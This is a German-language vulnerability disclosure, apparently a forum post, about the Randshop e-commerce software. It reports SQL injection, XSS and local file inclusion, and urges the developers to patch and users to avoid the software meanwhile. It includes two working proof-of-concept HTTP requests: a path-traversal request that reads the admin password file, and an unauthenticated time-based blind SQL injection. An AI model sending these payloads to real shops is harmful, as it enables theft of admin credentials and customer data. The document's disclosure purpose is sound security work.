ich möchte heute über einige ernsthafte Schwachstellen in Randshop berichten, die meiner Meinung nach dringend behoben werden müssen. Es handelt sich um mehrere SQL-Injection, Cross-Site Scripting und Local-File Inclusion Schwachstellen. Besonders alarmierend ist, dass die Local-File Inclusion zur Remote Code Execution erweitert werden kann.
Durch diese Schwachstellen können Angreifer beliebige Befehle auf dem System ausführen und den gesamten Shop übernehmen. Zudem können sie weitere sensible Konfigurationsdateien, inklusive Zugangsdaten zum Adminbereich und den Datenbanken, auslesen. Diese Sicherheitslücken sind extrem gefährlich und können verheerende Auswirkungen haben.
Es ist erschreckend zu sehen, dass diese Schwachstellen bisher nicht behoben wurden. Es ist dringend erforderlich, dass die Entwickler dieser Shopsoftware umgehend Maßnahmen ergreifen, um die Sicherheit der Software zu verbessern und die Privatsphäre der Benutzer zu gewährleisten.
Ich appelliere daher an die Verantwortlichen, sich der Ernsthaftigkeit dieser Situation bewusst zu werden und unverzüglich geeignete Maßnahmen zu ergreifen. Es ist wichtig, dass Sicherheitslücken schnellstmöglich geschlossen werden, um potenzielle Angriffe zu verhindern.
Die Local-File Inclusion befindet sich im Endpunkt "/templates/standard_2020/mail_html/index.php".
Durch den Paramter "content_file" können beliebige Pfade angegeben werden, welche durch "include_once" eingebunden werden.
- Code: Alles auswählen
POST /templates/standard_2020/mail_html/index.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
content_file=../../../admin/data/.passwd&tpl_betreiber_firma=&logo_image=&csspfad=char&tpl_betriber_ort=&tpl_betreiber_geschaeftsfuehrer=&headline=
Beispielsweise liest der oben genannte Request die Adminzugangsdaten aus.
Cross-Site Scripting Schwachstellen gibt es quasi überall. Ebenso SQL-Injection Schwachstellen. Beispielhaft ist eine der SQL-Injection Schwachstellen gezeigt, welche sich unauthentifiziert ausnutzen lässt.
- Code: Alles auswählen
POST /ajax/dataexchange.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
formaction=get_table_information&table_name=mail_log.%2a%20from%20randshop_mail_log%20WHERE%209452=9452%20AND%20(SELECT%208709%20FROM%20(SELECT(SLEEP(5)))MvQD)--%20KknR--%20-&fieldtype=&treeelement_id_array=
Hierdurch kann die Datenbank inklusive der "user"-Tabelle sowie Bestellinformationen ausgelesen werden.
Ich möchte dringend davon abraten, die Shopsoftware aufgrund schwerwiegender Sicherheitslücken zu verwenden. Bitte suchen Sie zeitnah nach einer Alternative, solange keine Updates für die Schwachstellen existieren.
Vielen Dank für eure Aufmerksamkeit und hoffentlich werden diese Sicherheitslücken bald behoben.